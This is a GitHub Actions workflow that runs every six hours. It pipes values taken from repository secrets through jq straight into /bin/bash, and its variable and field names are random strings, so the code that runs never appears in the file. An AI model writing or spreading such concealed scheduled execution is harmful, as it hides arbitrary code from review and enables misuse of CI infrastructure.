name: nongyuanhui7654

on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: nongyuanhui7654
        env:
          xavxo69: ${{ secrets.xavxo69 }}
        run: |
          echo $xavxo69 | jq -r .ds3808 | /bin/bash
          echo $s44 | jq -r .yr9749 | /bin/bash
          echo $ev00 | jq -r .s40 | /bin/bash
          echo $feedt442 | jq -r .qex4174 | /bin/bash
          echo $lxmz75 | jq -r .rxx1262 | /bin/bash
          echo $mwatc6 | jq -r .n3060 | /bin/bash
          echo $mr003 | jq -r .z2 | /bin/bash
          echo $o9231 | jq -r .ikeen430 | /bin/bash
          echo $ytdpl3 | jq -r .psnc6293 | /bin/bash

